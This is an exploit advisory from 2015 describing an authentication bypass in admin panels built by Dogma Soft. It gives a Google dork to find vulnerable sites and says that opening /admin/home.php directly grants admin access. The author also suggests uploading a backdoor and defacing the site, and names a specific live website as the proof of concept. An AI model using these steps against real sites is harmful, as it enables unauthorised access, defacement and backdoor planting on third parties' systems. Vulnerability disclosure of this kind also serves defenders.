Dogma Soft Direct login to admin panel without entering password

2015.08.25
Credit: Aaditya Purani
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd

-------------------------------------------------------------------------------------------------------------- # Exploit Title: Direct login to admin panel without entering password # Google Dork: ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd # Date: 2015-08-25 # Exploit Author: Aaditya Purani # Vendor Homepage: www.dogmaindia.com # Software Link: No software link # Version: Dogma Soft # Tested on: Kali Linux/ Windows 7 # CVE : Critical Vulnerability Hello, This is Aaditya purani and i have found a critical bug in websites which has been designed by dogmaindia. First type the dork "ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd" in google without Double quotes("). Then after find the site in which their is written ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd in the footer Now, go to it's admin page http://www.targetsite.com/admin After opening the admin panel . Follow this link http://www.targetsite.com/admin/home.php And voila you will be directly login into the admin panel and you can also upload your backdoor and deface. #POC: Site: http://tirupatiitc.com/ It's admin panel : http://tirupatiitc.com/admin/ Directly login to admin panel : http://tirupatiitc.com/admin/home.php Thank you Contact me : https://securityresearchindia.wordpress.com https://twitter.com/aaditya_purani


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top